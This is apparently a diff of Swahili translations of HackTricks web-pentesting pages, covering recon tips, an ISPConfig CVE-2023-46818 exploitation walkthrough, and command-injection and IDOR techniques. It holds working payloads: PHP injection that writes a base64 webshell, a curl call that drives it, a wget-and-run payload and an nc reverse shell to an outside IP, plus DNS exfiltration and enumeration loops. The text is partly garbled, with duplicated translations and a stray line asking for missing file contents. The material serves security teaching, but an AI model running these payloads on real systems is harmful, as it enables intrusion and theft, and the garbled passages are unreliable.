- **File Backups**: Mara tu unapokuwa umepata faili zote, angalia nakala za faili zote zinazoweza kutekelezwa ("_.php_", "_.aspx_"...). Mabadiliko ya kawaida ya kutaja nakala ni: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp na file.old._ Unaweza pia kutumia chombo [**bfac**](https://github.com/mazen160/bfac) **au** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Gundua parameta mpya**: Unaweza kutumia zana kama [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **na** [**Param Miner**](https://github.com/PortSwigger/param-miner) **kugundua parameta zilizofichwa. Ikiwa unaweza, unaweza kujaribu kutafuta** parameta zilizofichwa kwenye kila faili ya wavuti inayoweza kutekelezwa.
- _Arjun orodha zote za maneno za kawaida:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
- **File Backups**: Mara utakapopata faili zote, tafuta backups za faili zote za executable ("_.php_", "_.aspx_"...). Mabadiliko ya kawaida ya majina ya backup ni: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: Unaweza kutumia tools kama [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **kugundua parameters zilizofichwa. Ikiwa utaweza, jaribu kutafuta** hidden parameters kwenye kila executable web file.
- _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
- _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
- _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
- **Maoni:** Angalia maoni ya faili zote, unaweza kupata **credentials** au **ufunctionality iliyofichwa**.
- Ikiwa unacheza **CTF**, hila "ya kawaida" ni **kuficha** **habari** ndani ya maoni upande wa **kulia** wa **ukurasa** (ukitumia **mifumo** **miyingi** ili usione data ikiwa unafungua msimbo wa chanzo na kivinjari). Uwezekano mwingine ni kutumia **michoro kadhaa mipya** na **kuficha habari** katika maoni kwenye **chini** ya ukurasa wa wavuti.
- **API keys**: Ikiwa **unapata funguo zozote za API** kuna mwongozo unaoelekeza jinsi ya kutumia funguo za API za majukwaa tofauti: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Funguo za Google API: Ikiwa unapata funguo zozote za API zinazoonekana kama **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik unaweza kutumia mradi [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) kuangalia ni APIs zipi funguo hiyo inaweza kufikia.
- **S3 Buckets**: Wakati wa spidering angalia ikiwa **subdomain** au kiungo chochote kinahusiana na **S3 bucket**. Katika kesi hiyo, [**angalia** **permissions** za bucket](buckets/index.html).
- **Comments:** Angalia comments za faili zote, unaweza kupata **credentials** au **hidden functionality**.
- If you are playing **CTF**, ujanja "wa kawaida" ni ku**ficha** **taarifa** ndani ya comments upande wa **kulia** wa **ukurasa** (kwa kutumia **mamia** ya **spaces** hivyo huwezi kuona data ikiwa utafungua source code kwa browser). Mwingine uwezekano ni kutumia **several new lines** na **kuhifadhi taarifa** kwenye comment mwishoni mwa ukurasa wa wavuti.
- **API keys**: Ikiwa **unapata API key** kuna mwongozo unaoelezea jinsi ya kutumia API keys za platforms mbalimbali: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: Ikiwa unapata API key inayofanana na **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik unaweza kutumia project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) kuona ni APIs gani key inaweza kupata.
- **S3 Buckets**: Wakati wa spidering angalia kama subdomain yoyote au link yoyote ina uhusiano na S3 bucket. Katika hili, [**angalia** the **permissions** of the bucket](buckets/index.html).
### Matokeo Maalum
### Special findings
**Wakati** wa kufanya **spidering** na **brute-forcing** unaweza kupata **mambo ya kuvutia** ambayo unapaswa **kuangazia**.
**Wakati wa** kufanya **spidering** na **brute-forcing** unaweza kupata vitu **vichangamsha** ambavyo unapaswa **kutambua**.
**Faili za Kuvutia**
**Interesting files**
- Angalia **viungo** kwa faili nyingine ndani ya **CSS** files.
- [Ikiwa unapata faili ya _**.git**_ habari fulani inaweza kutolewa](git.md)
- Ikiwa unapata _**.env**_ habari kama funguo za api, nywila za db na habari nyingine zinaweza kupatikana.
- Ikiwa unapata **API endpoints** unapaswa pia kujaribu [kuzi](web-api-pentesting.md). Hizi si faili, lakini labda "zitakuwa" kama hizo.
- **Faili za JS**: Katika sehemu ya spidering zana kadhaa ambazo zinaweza kutoa njia kutoka kwa faili za JS zilitajwa. Pia, itakuwa ya kuvutia **kufuatilia kila faili ya JS iliyopatikana**, kwani katika baadhi ya matukio, mabadiliko yanaweza kuashiria kuwa udhaifu wa uwezekano umeingizwa katika msimbo. Unaweza kutumia kwa mfano [**JSMon**](https://github.com/robre/jsmon)**.**
- Unapaswa pia kuangalia faili za JS zilizogunduliwa na [**RetireJS**](https://github.com/retirejs/retire.js/) au [**JSHole**](https://github.com/callforpapers-source/jshole) ili kuona ikiwa ni dhaifu.
- **Javascript Deobfuscator na Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- Tafuta **links** za faili nyingine ndani ya **CSS** files.
- [If you find a _**.git**_ file some information can be extracted](git.md)
- Ikiwa unapata _**.env**_ unaweza kupata taarifa kama api keys, dbs passwords na taarifa nyingine.
- Ikiwa unapata **API endpoints** unapaswa [pia kuzijaribu](web-api-pentesting.md). Hizi si faili, lakini kwa kawaida "zinaweza kuonekana" kama faili.
- **JS files**: Katika sehemu ya spidering zimetajwa tools kadhaa ambazo zinaweza kutoa paths kutoka kwa JS files. Pia, itakuwa muhimu **kuangalia kila JS file uliyoipata**, kwani wakati mwingine, mabadiliko yanaweza kuashiria kwamba ranakuwepo vulnerability mpya kwenye code. Unaweza kutumia mfano [**JSMon**](https://github.com/robre/jsmon)**.**
- Unapaswa pia kukagua JS files zilizogunduliwa kwa kutumia [**RetireJS**](https://github.com/retirejs/retire.js/) au [**JSHole**](https://github.com/callforpapers-source/jshole) kuona kama zina vulnerabilities.
- **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
- **JsFuck deobfuscation** (javascript na herufi:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- Katika matukio kadhaa, itabidi **uelewe kanuni za kawaida** zinazotumika. Hii itakuwa na manufaa: [https://regex101.com/](https://regex101.com) au [https://pythonium.net/regex](https://pythonium.net/regex)
- Unaweza pia **kufuatilia faili ambapo fomu zilipatikana**, kwani mabadiliko katika parameta au kuonekana kwa fomu mpya kunaweza kuashiria uwezekano wa kazi mpya yenye udhaifu.
- Katika matukio mengi, utahitaji **kuelewa regular expressions** zinazotumika. Hii itakuwa ya msaada: [https://regex101.com/](https://regex101.com) au [https://pythonium.net/regex](https://pythonium.net/regex)
- Pia unaweza **kuangalia files ambazo ziligunduliwa kuwa zina forms**, kwani mabadiliko kwenye parameter au kuonekana kwa form mpya kunaweza kuashiria functionality mpya yenye hatari.
**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)**
{{#ref}}
403-and-401-bypasses.md
{{#endref}}
**502 Proxy Error**
Ikiwa ukurasa wowote **unajibu** na **nambari** hiyo, labda ni **proxy iliyo na usakinishaji mbaya**. **Ikiwa unatumia ombi la HTTP kama: `GET https://google.com HTTP/1.1`** (pamoja na kichwa cha mwenyeji na vichwa vingine vya kawaida), **proxy** itajaribu **kufikia** _**google.com**_ **na utakuwa umepata** SSRF.
Kama ukurasa wowote **unareact** kwa hiyo **code**, inawezekana kuwa ni **proxy iliyo misconfigured mbaya**. **Kama utatuma request ya HTTP kama: `GET https://google.com HTTP/1.1`** (ikiwa na host header na headers nyingine za kawaida), **proxy** itajaribu **kupata** _**google.com**_ **na utakuwa umepata** SSRF.
**NTLM Authentication - Info disclosure**
Ikiwa seva inayotumika inahitaji uthibitisho ni **Windows** au unapata kuingia inayohitaji **credentials** zako (na kuomba **jina la** **domain**), unaweza kusababisha **ufichuzi wa habari**.\
**Tuma** **kichwa**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` na kutokana na jinsi **uthibitisho wa NTLM unavyofanya kazi**, seva itajibu kwa habari za ndani (toleo la IIS, toleo la Windows...) ndani ya kichwa "WWW-Authenticate".\
Unaweza **kujiandaa** hii kwa kutumia **nmap plugin** "_http-ntlm-info.nse_".
Ikiwa server inayouliza authentication ni **Windows** au unapata login inayounga mkono **credentials** zako (na kuuliza **domain** **name**), unaweza kusababisha **info disclosure**.\
**Tuma** **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` na kutokana na jinsi **NTLM authentication inavyofanya kazi**, server itajibu kwa info za ndani (toleo la IIS, toleo la Windows...) ndani ya header "WWW-Authenticate".\
Unaweza **kuendesha hii kwa automation** kwa kutumia **nmap plugin** "_http-ntlm-info.nse_".
**HTTP Redirect (CTF)**
Inawezekana **kweka maudhui** ndani ya **Redirection**. Maudhui haya **hayataonyeshwa kwa mtumiaji** (kama kivinjari kitatekeleza redirection) lakini kitu kinaweza kuwa **kimefichwa** humo.
Inawezekana **kuweka content** ndani ya **Redirection**. Content hii **haitaonyeshwa kwa mtumiaji** (kwa sababu browser itafanya redirect) lakini kuna kitu kinaweza kuwa **kimefichwa** ndani yake.
### Kuangalia Udhaifu wa Wavuti
### Web Vulnerabilities Checking
Sasa baada ya kufanya enumeration kamili ya web application ni wakati wa kuangalia aina nyingi za possible vulnerabilities. Unaweza kupata checklist hapa:
Sasa kwamba orodha kamili ya programu ya wavuti imefanywa ni wakati wa kuangalia udhaifu wengi wa uwezekano. Unaweza kupata orodha ya ukaguzi hapa:
{{#ref}}
../../pentesting-web/web-vulnerabilities-methodology.md
{{#endref}}
Pata maelezo zaidi kuhusu udhaifu wa wavuti katika:
Find more info about web vulns in:
- [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
- [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html)
- [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
### Fuata Kurasa kwa Mabadiliko
### Monitor Pages for changes
Unaweza kutumia zana kama [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) kufuatilia kurasa kwa mabadiliko ambayo yanaweza kuingiza udhaifu.
Unaweza kutumia tools kama [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) kufuatilia kurasa kwa mabadiliko ambayo yanaweza kuingiza vulnerabilities.
### HackTricks Amri za Moja kwa Moja
### HackTricks Automatic Commands
```
Protocol_Name: Web #Protocol Abbreviation if there is one.
Port_Number: 80,443 #Comma separated if there is more than one.

91
src/network-services-pentesting/pentesting-web/ispconfig.md Normal file
View File

@ -0,0 +1,91 @@
# ISPConfig
{{#include ../../banners/hacktricks-training.md}}
## Muhtasari
ISPConfig ni paneli ya usimamizi wa hosting yenye chanzo wazi. Mjenzi wa zamani wa 3.2.x uliweka kipengele cha mhariri wa faili za lugha ambacho, kitakapoamilishwa kwa msimamizi mkuu, kiliruhusu kuingizwa kwa msimbo wa PHP wa hiari kupitia rekodi ya tafsiri iliyoharibika. Hii inaweza kusababisha RCE katika muktadha wa web server na, kulingana na jinsi PHP inavyotekelezwa, kuongezeka kwa ruhusa.
Njia za default muhimu:
- Web root mara nyingi iko katika `/var/www/ispconfig` inapohudumiwa na `php -S` au kupitia Apache/nginx.
- Admin UI inapatikana kwenye HTTP(S) vhost (wakati mwingine imefungwa kwa localhost tu; tumia SSH port-forward ikiwa inahitajika).
Kidokezo: Ikiwa paneli imefungwa kwa ndani (mfano `127.0.0.1:8080`), iforward:
```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```
## Mhariri wa lugha PHP code injection (CVE-2023-46818)
- Waliathirika: ISPConfig hadi 3.2.11 (fixed in 3.2.11p1)
- Masharti ya awali:
- Ingia kama akaunti ya superadmin iliyojengwa ndani `admin` (mawadhifa/majukumu mengine hayahusiki kulingana na muuzaji)
- Mhariri wa lugha lazima uwe umewezeshwa: `admin_allow_langedit=yes` katika `/usr/local/ispconfig/security/security_settings.ini`
- Athari: Admin aliethibitishwa anaweza kuingiza PHP yoyote inayohifadhiwa kwenye faili la lugha na kutekelezwa na programu, akipata RCE katika muktadha wa wavuti
Marejeo: NVD entry CVE-2023-46818 na kiungo cha ushauri cha muuzaji katika sehemu ya Marejeo hapa chini.
### Manual exploitation flow
1) Fungua/unda faili la lugha ili kupata tokeni za CSRF
Tuma POST ya kwanza ili kuanzisha fomu na kuchambua viwanja vya CSRF kutoka kwenye majibu ya HTML (`csrf_id`, `csrf_key`). Mfano wa njia ya ombi: `/admin/language_edit.php`.
2) Inject PHP via records[] and save
Tuma POST ya pili ikijumuisha viwanja vya CSRF na rekodi ya tafsiri hatarishi. Minimal command-execution probes:
```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...
lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```
Mtihani wa Out-of-band (angalia ICMP):
```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```
3) Andika faili na weke webshell
Tumia `file_put_contents` kuunda faili ndani ya path inayoweza kufikiwa kupitia wavuti (mfano, `admin/`):
```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```
Kisha andika webshell rahisi ukitumia base64 ili kuepuka herufi mbaya katika mwili wa POST:
```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```
I don't have the file contents. Please paste the markdown from src/network-services-pentesting/pentesting-web/ispconfig.md (or attach it) and I will translate the relevant English text to Swahili following your rules.
```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```
Ikiwa PHP inaendeshwa kama root (kwa mfano, kupitia `php -S 127.0.0.1:8080` iliyoanzishwa na root), hii inatoa RCE ya root mara moja. Vinginevyo, unapata utekelezaji wa msimbo kama mtumiaji wa server ya wavuti.
### Python PoC
Exploit tayari kwa kutumia huotomatiza kushughulikia token na kusambaza payload:
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
Mfano wa utekelezaji:
```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```
### Kuimarisha usalama
- Sasisha hadi 3.2.11p1 au baadaye
- Zima mhariri wa lugha isipokuwa ikihitajika kabisa:
```
admin_allow_langedit=no
```
- Epuka kuendesha paneli kama root; sanidi PHP-FPM au web server ili kupunguza idhini za ufikiaji
- Lazimisha uthibitishaji imara kwa akaunti ya `admin` iliyojengwa
## Marejeo
- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
- [CVE-2023-46818 NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../../banners/hacktricks-training.md}}

33
src/pentesting-web/command-injection.md
View File

@ -2,13 +2,13 @@
{{#include ../banners/hacktricks-training.md}}
## What is command Injection?
## Je, Command Injection ni nini?
A **command injection** inaruhusu utekelezaji wa amri za mfumo wa uendeshaji zisizo na mipaka na mshambuliaji kwenye seva inayohifadhi programu. Kama matokeo, programu na data zake zote zinaweza kuathiriwa kabisa. Utekelezaji wa amri hizi kawaida unaruhusu mshambuliaji kupata ufikiaji usioidhinishwa au kudhibiti mazingira ya programu na mfumo wa msingi.
A **command injection** inaruhusu utekelezaji wa amri yoyote za mfumo wa uendeshaji na mshambuliaji kwenye server inayohifadhi application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kufauliwa kabisa. Utekelezaji wa amri hizi kwa kawaida huwapa mshambuliaji ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi.
### Context
### Muktadha
Kulingana na **mahali ambapo ingizo lako linatolewa** unaweza kuhitaji **kufunga muktadha ulioandikwa** (ukitumia `"` au `'`) kabla ya amri.
Kulingana na **wapi ingizo lako linaingizwa** unaweza kuhitaji **kumaliza muktadha uliowekwa kwa nukuu** (ukitumia `"` au `'`) kabla ya amri.
## Command Injection/Execution
```bash
@ -18,6 +18,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)
#Only unix supported
`ls` # ``
@ -29,16 +30,16 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
### **Limitation** Bypasses
### **Limition** Bypasses
Ikiwa unajaribu kutekeleza **amri za kiholela ndani ya mashine ya linux** utavutiwa kusoma kuhusu hizi **Bypasses:**
Ikiwa unajaribu kutekeleza **amri za hiari ndani ya mashine ya linux** utapendezwa kusoma kuhusu haya **Bypasses:**
{{#ref}}
../linux-hardening/bypass-bash-restrictions/
{{#endref}}
### **Examples**
### **Mifano**
```
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
@ -46,7 +47,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod
```
### Parameters
Hapa kuna vigezo 25 bora ambavyo vinaweza kuwa na udhaifu wa kuingiza msimbo na udhaifu wa RCE unaofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)):
Hapa kuna vigezo 25 vya juu vinavyoweza kuwa nyeti kwa code injection na RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
```
?cmd={payload}
?exec={payload}
@ -90,7 +91,7 @@ sys 0m0.000s
```
### DNS based data exfiltration
Kulingana na chombo kutoka `https://github.com/HoLyVieR/dnsbin` pia kinachohifadhiwa kwenye dnsbin.zhack.ca
Imetegemea tool kutoka `https://github.com/HoLyVieR/dnsbin` pia inayoendeshwa kwenye dnsbin.zhack.ca
```
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
@ -100,7 +101,7 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
Online tools to check for DNS based data exfiltration:
Zana za mtandaoni za kuangalia DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
@ -121,7 +122,7 @@ powershell C:**2\n??e*d.*? # notepad
### Node.js `child_process.exec` vs `execFile`
Wakati wa kukagua JavaScript/TypeScript back-ends mara nyingi utapata Node.js `child_process` API.
Unapofanya ukaguzi wa JavaScript/TypeScript back-ends, mara nyingi utakutana na Node.js `child_process` API.
```javascript
// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
@ -129,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
/* … */
});
```
`exec()` inazalisha **shell** (`/bin/sh -c`), hivyo kila herufi ambayo ina maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati pembejeo ya mtumiaji inachanganywa katika string.
`exec()` huanzisha **shell** (`/bin/sh -c`), hivyo alama yoyote inayokuwa na maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa katika msururu wa herufi.
**Mitigation:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila hoja kama kipengele tofauti cha array** ili shell isihusike:
**Kupunguza hatari:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na toa **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe:
```javascript
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
@ -139,7 +140,7 @@ execFile('/usr/bin/do-something', [
'--payload', JSON.stringify(payload)
]);
```
Mifano halisi: *Synology Photos* ≤ 1.7.0-0794 ilitumiwa kupitia tukio la WebSocket lisilo na uthibitisho ambalo lilihifadhi data inayodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye ilijumuishwa katika wito wa `exec()`, ikipata RCE (Pwn2Own Ireland 2024).
Kisa cha ulimwengu halisi: *Synology Photos* ≤ 1.7.0-0794 kilikuwa kinaweza kutumika kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye ilingizwa katika wito la `exec()`, ikipelekea RCE (Pwn2Own Ireland 2024).
## Orodha ya Ugunduzi wa Brute-Force
@ -148,11 +149,13 @@ Mifano halisi: *Synology Photos* ≤ 1.7.0-0794 ilitumiwa kupitia tukio la WebSo
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
{{#endref}}
## Marejeleo
## Marejeo
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE202346818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../banners/hacktricks-training.md}}

83
src/pentesting-web/idor.md
View File

@ -2,20 +2,21 @@
{{#include ../banners/hacktricks-training.md}}
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) inajitokeza wakati mwisho wa wavuti au API unatoa au unakubali kitambulisho kinachoweza kudhibitiwa na mtumiaji ambacho kinatumika **moja kwa moja** kufikia kitu cha ndani **bila kuthibitisha kwamba mpiga simu anaidhinishwa** kufikia/kubadilisha kitu hicho. Utekelezaji wa mafanikio kawaida unaruhusu kupanda kwa haki za usawa au wima kama kusoma au kubadilisha data za watumiaji wengine na, katika hali mbaya, kuchukua akaunti kamili au kuhamasisha data kwa wingi.
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) hujitokeza wakati endpoint ya web au API inaonyesha au inakubali kitambulisho kinachoweza kudhibitiwa na mtumiaji ambacho kinatumika **moja kwa moja** kufikia kitu cha ndani **bila kuthibitisha kwamba aliyeita ana idhini** ya kufikia/kuhariri kitu hicho.
Utekelezaji unaofanikiwa kwa kawaida unaruhusu kuongezeka kwa mamlaka kwa njia ya horizontal au vertical, kama kusoma au kuhariri data za watumiaji wengine na, katika kesi mbaya kabisa, kunyongwa udhibiti wa akaunti au kutoa data kwa wingi.
---
## 1. Kutambua IDOR zinazoweza kutokea
## 1. Kutambua IDOR Zinaoweza Kutokea
1. Tafuta **parameta zinazorejelea kitu**:
* Njia: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
* Swali: `?id=42`, `?invoice=2024-00001`
* Mwili / JSON: `{"user_id": 321, "order_id": 987}`
* Vichwa / Cookies: `X-Client-ID: 4711`
2. Prefer mwisho ambao **unasoma au kubadilisha** data (`GET`, `PUT`, `PATCH`, `DELETE`).
3. Kumbuka wakati vitambulisho ni **mfuatano au vinavyoweza kutabiriwa** ikiwa ID yako ni `64185742`, basi `64185741` huenda ipo.
4. Chunguza njia zilizofichwa au mbadala (mfano *"Paradox team members"* kiungo kwenye kurasa za kuingia) ambazo zinaweza kufichua APIs za ziada.
5. Tumia **sehemu ya kuthibitishwa ya chini ya haki** na badilisha tu ID **ukihifadhi token/cookie ile ile**. Kukosekana kwa kosa la uthibitisho kawaida ni ishara ya IDOR.
1. Tafuta **vigezo vinavyorejea kitu**:
* Path: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
* Query: `?id=42`, `?invoice=2024-00001`
* Body / JSON: `{"user_id": 321, "order_id": 987}`
* Headers / Cookies: `X-Client-ID: 4711`
2. Pendelea endpoints zinazofanya **kusoma au kusasisha** data (`GET`, `PUT`, `PATCH`, `DELETE`).
3. Tambua wakati vitambulisho ni **mfuatano au vinavyoweza kutabirika** kama ID yako ni `64185742`, basi `64185741` huenda ipo.
4. Chunguza njia zilizofichwa au mbadala (mfano *"Paradox team members"* link katika kurasa za kuingia) ambazo zinaweza kufichua API za ziada.
5. Tumia kikao chenye **uthibitishaji kilicho na ruhusa ndogo** na ubadilishe tu ID huku **ukiendelea kutumia token/cookie ile ile**. Kukosekana kwa kosa la idhini kwa kawaida ni dalili ya IDOR.
### Quick manual tampering (Burp Repeater)
```
@ -26,7 +27,7 @@ Content-Type: application/json
{"lead_id":64185741}
```
### Uainishaji wa otomatiki (Burp Intruder / curl loop)
### Orodhesho otomatiki (Burp Intruder / curl loop)
```bash
for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
@ -36,17 +37,36 @@ curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
done
```
---
## 2. Utafiti wa Kesi Halisi Jukwaa la Chatbot la McHire (2025)
Wakati wa tathmini ya lango la ajira la **McHire** lililofanywa na Paradox.ai, IDOR ifuatayo iligundulika:
### Oracle ya majibu ya makosa kwa user/file enumeration
Wakati endpoint ya download inakubali username na filename (mfano `/view.php?username=<u>&file=<f>`), tofauti ndogo katika ujumbe za makosa mara nyingi huunda oracle:
- Jina la mtumiaji lisilopo → "User not found"
- Filename mbaya lakini extension halali → "File does not exist" (mara nyingine pia huorodhesha available files)
- Extension mbaya → validation error
Kwa kikao chochote kilichothibitishwa, unaweza fuzz parameter ya username huku ukishikilia filename ya kawaida na kuchuja kwa string "user not found" ili kugundua watumiaji halali:
```bash
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'
```
Mara tu majina halali ya watumiaji yanapotambuliwa, omba faili maalumu moja kwa moja (kwa mfano, `/view.php?username=amanda&file=privacy.odt`). Muundo huu kwa kawaida husababisha ufunuliwa bila idhini wa nyaraka za watumiaji wengine na uvuaji wa credentials.
---
## 2. Mfano wa Kesi Halisi McHire Chatbot Platform (2025)
